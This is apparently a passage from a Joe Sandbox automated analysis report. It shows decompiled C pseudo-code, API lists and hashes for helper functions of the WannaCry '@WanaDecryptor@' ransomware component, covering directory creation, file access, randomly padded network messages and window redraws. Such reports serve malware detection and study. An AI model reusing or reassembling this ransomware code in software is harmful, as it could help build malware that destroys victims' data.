                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040B6A0(CHAR* _a4, CHAR* _a8, intOrPtr _a12) {
				char _v520;
				void _v816;
				struct _SECURITY_ATTRIBUTES* _v820;
				void* _t15;
				struct _SECURITY_ATTRIBUTES* _t37;
				CHAR* _t38;
				void* _t39;
				CHAR* _t40;
				struct _SECURITY_ATTRIBUTES** _t42;
				struct _SECURITY_ATTRIBUTES** _t44;

				_t40 = _a4;
				CreateDirectoryA(_t40, 0);
				_t38 = _a8;
				_t15 = E00412920(_t38, _a12);
				_t28 = _t15;
				_t42 =  &(( &_v820)[2]);
				if(_t15 != 0) {
					_v820 = 0;
					memset( &_v816, 0, 0x4a << 2);
					E00412940(_t28, 0xffffffff,  &_v820);
					_t37 = _v820;
					_t44 =  &(_t42[6]);
					if(_t37 > 0) {
						_t39 = 0;
						if(_t37 > 0) {
							do {
								E00412940(_t28, _t39,  &_v820);
								sprintf( &_v520, "%s\\%s", _t40,  &_v816);
								E004129E0(_t28, _t39,  &_v520);
								_t44 =  &(_t44[0xa]);
								_t39 = _t39 + 1;
							} while (_t39 < _t37);
						}
						E00412A00(_t28);
						return 1;
					} else {
						return 0;
					}
				} else {
					DeleteFileA(_t38);
					return 0;
				}
			}













                                                      0x0040b6a8
                                                      0x0040b6b4
                                                      0x0040b6c1
                                                      0x0040b6ca
                                                      0x0040b6cf
                                                      0x0040b6d1
                                                      0x0040b6d6
                                                      0x0040b6f7
                                                      0x0040b6ff
                                                      0x0040b709
                                                      0x0040b70e
                                                      0x0040b712
                                                      0x0040b717
                                                      0x0040b726
                                                      0x0040b72a
                                                      0x0040b72c
                                                      0x0040b733
                                                      0x0040b74e
                                                      0x0040b75d
                                                      0x0040b762
                                                      0x0040b765
                                                      0x0040b766
                                                      0x0040b72c
                                                      0x0040b76b
                                                      0x0040b77f
                                                      0x0040b71c
                                                      0x0040b725
                                                      0x0040b725
                                                      0x0040b6d8
                                                      0x0040b6d9
                                                      0x0040b6eb
                                                      0x0040b6eb

                                                      APIs
                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,00000000,00000428), ref: 0040B6B4
                                                      • DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateDeleteDirectoryFile
                                                      • String ID: %s\%s
                                                      • API String ID: 3195586388-4073750446
                                                      • Opcode ID: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                                      • Instruction ID: 62764616b0dad41b6f02366a4e891bd604a257d4ac44bdf0c04ae484a2ff6343
                                                      • Opcode Fuzzy Hash: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                                      • Instruction Fuzzy Hash: 2F2108B620435067D620AB65EC81AEB779CEBC4324F44082EFD1892242E77D661D82FA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D150 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 74%
                                                      			E0040D150(int __eax, intOrPtr* __ecx, void* __edi, char _a4, char _a8, char _a12, intOrPtr* _a16) {
				char _v500;
				intOrPtr _v508;
				char _v520;
				char _v521;
				char _v528;
				char _v529;
				intOrPtr _v536;
				signed int _t42;
				short _t46;
				signed int _t48;
				int _t62;
				intOrPtr* _t63;
				intOrPtr _t67;
				intOrPtr _t81;
				void* _t82;
				void* _t83;
				void* _t89;
				void* _t94;
				intOrPtr* _t95;
				void* _t97;
				void* _t99;

				_t89 = __edi;
				_t63 = __ecx;
				_push(0);
				L0041303E();
				srand(__eax);
				_t99 =  &_v508 + 8;
				_t42 = rand();
				asm("cdq");
				_t94 = 0;
				_t81 = _t42 % 0xc8 + 0x1f;
				_v508 = _t81;
				if(_t81 > 0) {
					do {
						_t62 = rand();
						_t81 = _v508;
						 *(_t99 + _t94 + 0x14) = _t62;
						_t94 = _t94 + 1;
					} while (_t94 < _t81);
				}
				_t95 = _a16;
				_t97 = _t99 + _t81 - 0xb;
				if(_t95 != 0) {
					_push(_t89);
					memcpy(_t97, E0040D5C0(_t95), 7 << 2);
					_t99 = _t99 + 0xc;
					asm("movsw");
					asm("movsb");
					_t81 = _v508;
					_t95 = _a16;
				}
				 *((char*)(_t99 + _t81 + 0x14)) = _a4;
				_t82 = _t81 + 1;
				 *((char*)(_t99 + _t82 + 0x1c)) = _a8;
				_t83 = _t82 + 1;
				 *((char*)(_t99 + _t83 + 0x1c)) = _a12;
				_v508 = _t83 + 1;
				_t46 = E00412B00(_t97, 0x1f);
				_t67 = _v508;
				 *((short*)(_t99 + 8 + _t67 + 0x14)) = _t46;
				_t48 =  *((intOrPtr*)( *_t63 + 0x18))(2,  &_v500, _t67 + 2, 0);
				if(_t48 < 0) {
					L12:
					return _t48 | 0xffffffff;
				} else {
					E0040D5A0(_t63, _t97);
					_push( &_v528);
					_push( &_v520);
					_push( &_v521);
					_v528 = 0x1f4;
					if( *((intOrPtr*)( *_t63 + 0x1c))() < 0 || _v529 != 2) {
						_t48 =  *((intOrPtr*)( *_t63 + 0xc))();
						goto L12;
					} else {
						if(_t95 == 0) {
							L10:
							return 0;
						} else {
							_push(1);
							_push(_v536);
							_push( &_v528);
							_push(2);
							if( *((intOrPtr*)( *_t95 + 0x18))() == 0) {
								goto L10;
							} else {
								return  *((intOrPtr*)( *_t63 + 0xc))() | 0xffffffff;
							}
						}
					}
				}
			}
























                                                      0x0040d150
                                                      0x0040d159
                                                      0x0040d15b
                                                      0x0040d15d
                                                      0x0040d163
                                                      0x0040d168
                                                      0x0040d16b
                                                      0x0040d170
                                                      0x0040d176
                                                      0x0040d17a
                                                      0x0040d17f
                                                      0x0040d183
                                                      0x0040d185
                                                      0x0040d185
                                                      0x0040d18a
                                                      0x0040d18e
                                                      0x0040d192
                                                      0x0040d193
                                                      0x0040d185
                                                      0x0040d197
                                                      0x0040d19e
                                                      0x0040d1a4
                                                      0x0040d1a6
                                                      0x0040d1b7
                                                      0x0040d1b7
                                                      0x0040d1b9
                                                      0x0040d1bb
                                                      0x0040d1bc
                                                      0x0040d1c0
                                                      0x0040d1c7
                                                      0x0040d1d6
                                                      0x0040d1e1
                                                      0x0040d1e5
                                                      0x0040d1e9
                                                      0x0040d1ea
                                                      0x0040d1ef
                                                      0x0040d1f3
                                                      0x0040d1f8
                                                      0x0040d201
                                                      0x0040d215
                                                      0x0040d21a
                                                      0x0040d297
                                                      0x0040d2a1
                                                      0x0040d21c
                                                      0x0040d21f
                                                      0x0040d22a
                                                      0x0040d233
                                                      0x0040d234
                                                      0x0040d237
                                                      0x0040d244
                                                      0x0040d292
                                                      0x00000000
                                                      0x0040d24d
                                                      0x0040d24f
                                                      0x0040d282
                                                      0x0040d28b
                                                      0x0040d251
                                                      0x0040d257
                                                      0x0040d25d
                                                      0x0040d25e
                                                      0x0040d25f
                                                      0x0040d268
                                                      0x00000000
                                                      0x0040d26a
                                                      0x0040d27d
                                                      0x0040d27d
                                                      0x0040d268
                                                      0x0040d24f
                                                      0x0040d244

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: rand$srandtime
                                                      • String ID:
                                                      • API String ID: 1946231456-0
                                                      • Opcode ID: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                                      • Instruction ID: 99a3411600cb7ade80f66248b35b99165d2bae15bbb14ca3cd699ef114e4807e
                                                      • Opcode Fuzzy Hash: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                                      • Instruction Fuzzy Hash: 6E411231A083454BD314DE69D885BABFBD4AFD4710F04893EE885973C2DA78D94987E3
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004108A0 Relevance: 6.1, APIs: 4, Instructions: 107fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 97%
                                                      			E004108A0(CHAR* _a4, intOrPtr _a8, char _a12, long* _a16) {
				long _t28;
				signed int _t38;
				void* _t44;
				long* _t45;
				long _t46;
				char _t47;

				_t47 = _a12;
				if(_t47 == 1 || _t47 == 2 || _t47 == 3) {
					_t45 = _a16;
					_t44 = 0;
					_t38 = 0;
					 *_t45 = 0;
					_a12 = 0;
					if(_t47 == 1) {
						_t44 = _a4;
						_a12 = 0;
						goto L10;
					} else {
						if(_t47 != 2) {
							L11:
							_push(0x20);
							L00412CEC();
							_t46 = _t28;
							if(_t47 == 1 || _t47 == 2) {
								 *_t46 = 1;
								 *((char*)(_t46 + 0x10)) = _a12;
								 *(_t46 + 1) = _t38;
								 *(_t46 + 4) = _t44;
								 *((char*)(_t46 + 8)) = 0;
								 *(_t46 + 0xc) = 0;
								if(_t38 != 0) {
									 *(_t46 + 0xc) = SetFilePointer(_t44, 0, 0, 1);
								}
								 *_a16 = 0;
								return _t46;
							} else {
								 *((intOrPtr*)(_t46 + 0x14)) = _a4;
								 *((intOrPtr*)(_t46 + 0x18)) = _a8;
								 *_t46 = 0;
								 *(_t46 + 1) = 1;
								 *((char*)(_t46 + 0x10)) = 0;
								 *((intOrPtr*)(_t46 + 0x1c)) = 0;
								 *(_t46 + 0xc) = 0;
								 *_a16 = 0;
								return _t46;
							}
						} else {
							_t44 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
							if(_t44 != 0xffffffff) {
								_a12 = 1;
								L10:
								_t28 = SetFilePointer(_t44, 0, 0, 1);
								_t38 = _t38 & 0xffffff00 | _t28 != 0xffffffff;
								goto L11;
							} else {
								 *_t45 = 0x200;
								return 0;
							}
						}
					}
				} else {
					 *_a16 = 0x10000;
					return 0;
				}
			}









                                                      0x004108a2
                                                      0x004108ab
                                                      0x004108c8
                                                      0x004108cc
                                                      0x004108ce
                                                      0x004108d3
                                                      0x004108d9
                                                      0x004108dd
                                                      0x00410915
                                                      0x00410919
                                                      0x00000000
                                                      0x004108df
                                                      0x004108e2
                                                      0x00410938
                                                      0x00410938
                                                      0x0041093a
                                                      0x00410945
                                                      0x00410947
                                                      0x00410980
                                                      0x00410985
                                                      0x00410988
                                                      0x0041098b
                                                      0x0041098e
                                                      0x00410992
                                                      0x00410999
                                                      0x004109a8
                                                      0x004109a8
                                                      0x004109b4
                                                      0x004109bb
                                                      0x0041094e
                                                      0x00410956
                                                      0x0041095d
                                                      0x00410962
                                                      0x00410965
                                                      0x00410969
                                                      0x0041096d
                                                      0x00410970
                                                      0x00410973
                                                      0x0041097b
                                                      0x0041097b
                                                      0x004108e4
                                                      0x00410901
                                                      0x00410906
                                                      0x00410920
                                                      0x00410925
                                                      0x0041092c
                                                      0x00410935
                                                      0x00000000
                                                      0x00410908
                                                      0x00410908
                                                      0x00410914
                                                      0x00410914
                                                      0x00410906
                                                      0x004108e2
                                                      0x004108b7
                                                      0x004108be
                                                      0x004108c7
                                                      0x004108c7

                                                      APIs
                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 004108FB
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041092C
                                                      • #823.MFC42(00000020,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041093A
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?), ref: 004109A2
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Pointer$#823Create
                                                      • String ID:
                                                      • API String ID: 3407337251-0
                                                      • Opcode ID: 5b6d965423cb05d7ea7d52203198f533352c1688dc5c73679a86205e0e0c5deb
                                                      • Instruction ID: 085c1855c78cd49c3d24b3d31d21a090ac304bae7dbf1d621fd5eca193cafac9
                                                      • Opcode Fuzzy Hash: 5b6d965423cb05d7ea7d52203198f533352c1688dc5c73679a86205e0e0c5deb
                                                      • Instruction Fuzzy Hash: BD31A3712943418FE331CF29E84179BBBE1AB85720F14891EE1D597781D3B6A4C8CBA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00412250 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E00412250(CHAR* _a4, void* _a8) {
				void _v260;
				char _v520;
				long _t16;
				void* _t17;
				void* _t29;
				CHAR* _t32;
				signed int _t33;
				signed int _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;
				signed int _t47;
				signed int _t51;
				signed int _t52;
				void* _t56;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t87;
				char* _t88;
				char* _t93;

				_t88 =  &_v520;
				_t32 = _a4;
				if(_t32 != 0) {
					_t16 = GetFileAttributesA(_t32);
					if(_t16 == 0xffffffff) {
						_t16 = CreateDirectoryA(_t32, 0);
					}
				}
				_t87 = _a8;
				_t34 =  *_t87;
				if(_t34 == 0) {
					L15:
					return _t16;
				} else {
					_t17 = _t87;
					_t56 = _t87;
					do {
						if(_t34 == 0x2f || _t34 == 0x5c) {
							_t17 = _t56;
						}
						_t34 =  *(_t56 + 1);
						_t56 = _t56 + 1;
					} while (_t34 != 0);
					if(_t17 != _t87) {
						_t86 = _t87;
						_t51 = _t17 - _t87;
						_t52 = _t51 >> 2;
						memcpy( &_v260, _t86, _t52 << 2);
						_t29 = memcpy(_t86 + _t52 + _t52, _t86, _t51 & 0x00000003);
						_t93 =  &(_t88[0x18]);
						_t34 = 0;
						_t93[_t29 + 0x114] = 0;
						E00412250(_t32,  &_v260);
						_t88 =  &(_t93[8]);
					}
					_v520 = 0;
					if(_t32 != 0) {
						asm("repne scasb");
						_t46 =  !(_t34 | 0xffffffff);
						_t85 = _t32 - _t46;
						_t47 = _t46 >> 2;
						memcpy(_t85 + _t47 + _t47, _t85, memcpy( &_v520, _t85, _t47 << 2) & 0x00000003);
						_t88 =  &(_t88[0x18]);
						_t34 = 0;
					}
					asm("repne scasb");
					_t36 =  !(_t34 | 0xffffffff);
					_t83 = _t87 - _t36;
					_t33 = _t36;
					asm("repne scasb");
					_t39 = _t33 >> 2;
					memcpy( &_v520 - 1, _t83, _t39 << 2);
					memcpy(_t83 + _t39 + _t39, _t83, _t33 & 0x00000003);
					_t16 = GetFileAttributesA( &_v520);
					if(_t16 != 0xffffffff) {
						goto L15;
					} else {
						return CreateDirectoryA( &_v520, 0);
					}
				}
			}
























                                                      0x00412250
                                                      0x00412257
                                                      0x00412261
                                                      0x00412264
                                                      0x0041226d
                                                      0x00412272
                                                      0x00412272
                                                      0x0041226d
                                                      0x00412278
                                                      0x0041227f
                                                      0x00412284
                                                      0x0041235a
                                                      0x0041235a
                                                      0x0041228a
                                                      0x0041228a
                                                      0x0041228c
                                                      0x0041228e
                                                      0x00412291
                                                      0x00412298
                                                      0x00412298
                                                      0x0041229a
                                                      0x0041229d
                                                      0x0041229e
                                                      0x004122a6
                                                      0x004122aa
                                                      0x004122ac
                                                      0x004122b7
                                                      0x004122ba
                                                      0x004122c1
                                                      0x004122c1
                                                      0x004122c1
                                                      0x004122c3
                                                      0x004122d4
                                                      0x004122d9
                                                      0x004122d9
                                                      0x004122de
                                                      0x004122e3
                                                      0x004122f0
                                                      0x004122f2
                                                      0x004122f8
                                                      0x004122fc
                                                      0x00412306
                                                      0x00412306
                                                      0x00412306
                                                      0x00412306
                                                      0x00412313
                                                      0x00412315
                                                      0x00412319
                                                      0x0041231b
                                                      0x00412322
                                                      0x00412327
                                                      0x0041232a
                                                      0x00412336
                                                      0x00412338
                                                      0x00412343
                                                      0x00000000
                                                      0x00412345
                                                      0x00000000
                                                      0x0041234c
                                                      0x00412343

                                                      APIs
                                                      • GetFileAttributesA.KERNEL32(?,?,?), ref: 00412264
                                                      • CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 00412338
                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 0041234C
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesCreateDirectoryFile
                                                      • String ID:
                                                      • API String ID: 3401506121-0
                                                      • Opcode ID: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                                      • Instruction ID: eaae320e7248a4b774ebe1124a4f316430e5356865ecc18a96ed259e18cc5035
                                                      • Opcode Fuzzy Hash: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                                      • Instruction Fuzzy Hash: 6F310331204B0847C72889389D957FFBBC6ABD4320F544B3EF966C72C1DEB989588299
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406A00 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E00406A00(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12) {
				void* _t15;
				signed int _t23;
				intOrPtr* _t33;
				void* _t34;

				_t23 = _a12;
				_t33 = _a4;
				_push(_t23);
				_push(_a8);
				_t34 = __ecx;
				_push(_t33);
				L00412D6A();
				if(_t23 > 6) {
					L12:
					return _t15;
				} else {
					switch( *((intOrPtr*)(_t23 * 4 +  &M00406ABC))) {
						case 0:
							_push( *((intOrPtr*)(__ecx + 0x824)));
							_t17 =  *((intOrPtr*)( *_t33 + 0x34))();
							L00412D64();
							if(_t17 == 0x402) {
								L6:
								_push(0xe0e0);
								 *((intOrPtr*)( *_t33 + 0x38))();
							} else {
								L00412D64();
								if(_t17 == 0x3fe) {
									goto L6;
								} else {
									L00412D64();
									if(_t17 == 0x3fb) {
										goto L6;
									} else {
										_push(0xffffff);
										 *((intOrPtr*)( *_t33 + 0x38))();
									}
								}
							}
							_t35 =  *((intOrPtr*)(_t34 + 0x828));
							if(_t35 != 0) {
								goto L11;
							}
							return 0;
							goto L13;
						case 1:
							goto L12;
						case 2:
							_push( *((intOrPtr*)(__esi + 0x824)));
							__ecx = __edi;
							 *((intOrPtr*)( *__edi + 0x34))();
							if(__esi != 0) {
								L11:
								return  *((intOrPtr*)(_t35 + 4));
							}
							return 0;
							goto L13;
					}
				}
				L13:
			}







                                                      0x00406a01
                                                      0x00406a0c
                                                      0x00406a10
                                                      0x00406a11
                                                      0x00406a12
                                                      0x00406a14
                                                      0x00406a15
                                                      0x00406a1d
                                                      0x00406ab7
                                                      0x00406ab7
                                                      0x00406a23
                                                      0x00406a23
                                                      0x00000000
                                                      0x00406a32
                                                      0x00406a35
                                                      0x00406a3a
                                                      0x00406a44
                                                      0x00406a70
                                                      0x00406a72
                                                      0x00406a79
                                                      0x00406a46
                                                      0x00406a48
                                                      0x00406a52
                                                      0x00000000
                                                      0x00406a54
                                                      0x00406a56
                                                      0x00406a60
                                                      0x00000000
                                                      0x00406a62
                                                      0x00406a64
                                                      0x00406a6b
                                                      0x00406a6b
                                                      0x00406a60
                                                      0x00406a52
                                                      0x00406a7c
                                                      0x00406a84
                                                      0x00000000
                                                      0x00000000
                                                      0x00406a8c
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406a97
                                                      0x00406a98
                                                      0x00406a9a
                                                      0x00406aa5
                                                      0x00406ab0
                                                      0x00000000
                                                      0x00406ab0
                                                      0x00406aad
                                                      0x00000000
                                                      0x00000000
                                                      0x00406a23
                                                      0x00000000

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #3089$#4476
                                                      • String ID:
                                                      • API String ID: 2870283385-0
                                                      • Opcode ID: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
                                                      • Instruction ID: 793279239b1821bde48ff71d8c5d322d7df26b5d288dea54ba4f6719e02562de
                                                      • Opcode Fuzzy Hash: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
                                                      • Instruction Fuzzy Hash: D91181323012018BC624EA59D584D7FB3A9EF89321B15842FE947E7391CB39ACA19B95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D0A0 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E0040D0A0(int __eax, intOrPtr* __ecx, char _a4, char _a8) {
				char _v500;
				signed int _t22;
				signed int _t27;
				intOrPtr* _t32;
				void* _t40;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t49;

				_t32 = __ecx;
				_push(0);
				L0041303E();
				srand(__eax);
				_t49 =  &_v500 + 8;
				_t22 = rand();
				asm("cdq");
				_t40 = 0;
				_t43 = _t22 % 0xc8 + 0x1f;
				if(_t43 <= 0) {
					L2:
					_t41 = _t49 + _t43 - 0x13;
					 *((char*)(_t49 + _t43 + 0xc)) = _a4;
					_t44 = _t43 + 1;
					 *((char*)(_t49 + _t44 + 0x14)) = 0;
					_t45 = _t44 + 1;
					 *((char*)(_t49 + _t45 + 0x14)) = _a8;
					_t46 = _t45 + 1;
					 *((short*)(_t49 + 8 + _t46 + 0xc)) = E00412B00(_t49 + _t43 - 0x13, 0x1f);
					_t27 =  *((intOrPtr*)( *_t32 + 0x18))(2,  &_v500, _t46 + 2, 0);
					if(_t27 >= 0) {
						E0040D5A0(_t32, _t41);
						return 0;
					} else {
						return _t27 | 0xffffffff;
					}
				} else {
					goto L1;
				}
				do {
					L1:
					 *((char*)(_t49 + _t40 + 0xc)) = rand();
					_t40 = _t40 + 1;
				} while (_t40 < _t43);
				goto L2;
			}













                                                      0x0040d0a9
                                                      0x0040d0ab
                                                      0x0040d0ad
                                                      0x0040d0b3
                                                      0x0040d0b8
                                                      0x0040d0bb
                                                      0x0040d0c0
                                                      0x0040d0c6
                                                      0x0040d0cc
                                                      0x0040d0d1
                                                      0x0040d0e1
                                                      0x0040d0ef
                                                      0x0040d0f3
                                                      0x0040d0f7
                                                      0x0040d0fb
                                                      0x0040d100
                                                      0x0040d101
                                                      0x0040d105
                                                      0x0040d110
                                                      0x0040d124
                                                      0x0040d129
                                                      0x0040d13d
                                                      0x0040d14d
                                                      0x0040d12d
                                                      0x0040d137
                                                      0x0040d137
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040d0d3
                                                      0x0040d0d3
                                                      0x0040d0d8
                                                      0x0040d0dc
                                                      0x0040d0dd
                                                      0x00000000

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: rand$srandtime
                                                      • String ID:
                                                      • API String ID: 1946231456-0
                                                      • Opcode ID: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                                      • Instruction ID: 418ba94e1263f5c278544cd72932f8c5cb06cad23ebf9749a5f73f3a0ac0752c
                                                      • Opcode Fuzzy Hash: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                                      • Instruction Fuzzy Hash: CB113D3164935106D3207A2A6C02BAFAB949FE1728F04493FE9D9962C2C46C894E83F7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405180 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 71%
                                                      			E00405180(void* __ecx, intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t19;
				void* _t26;

				_t19 = _a4;
				_t26 = __ecx;
				_t10 =  *((intOrPtr*)(__ecx + 0x44));
				__imp___mbscmp(_t10, _t19);
				if(_t10 == 0) {
					return _t10;
				} else {
					_push(_t19);
					L00412DA0();
					 *((char*)(__ecx + 0x48)) = 1;
					if( *((intOrPtr*)(__ecx + 0x74)) == 0) {
						E00405800(__ecx, 0);
					}
					if( *((intOrPtr*)(_t26 + 0x70)) == 0) {
						E00405820(_t26, 0);
					}
					if( *((intOrPtr*)(_t26 + 0x49)) == 0) {
						return InvalidateRect( *(_t26 + 0x20), 0, 1);
					}
					return RedrawWindow( *(_t26 + 0x20), 0, 0, 0x121);
				}
			}






                                                      0x00405181
                                                      0x00405186
                                                      0x0040518a
                                                      0x00405191
                                                      0x0040519c
                                                      0x004051fb
                                                      0x0040519e
                                                      0x0040519e
                                                      0x004051a1
                                                      0x004051a9
                                                      0x004051af
                                                      0x004051b5
                                                      0x004051b5
                                                      0x004051bf
                                                      0x004051c5
                                                      0x004051c5
                                                      0x004051cf
                                                      0x00000000
                                                      0x004051f2
                                                      0x004051e7
                                                      0x004051e7

                                                      APIs
                                                      • _mbscmp.MSVCRT ref: 00405191
                                                      • #860.MFC42(?), ref: 004051A1
                                                      • RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
                                                      Memory Dump Source
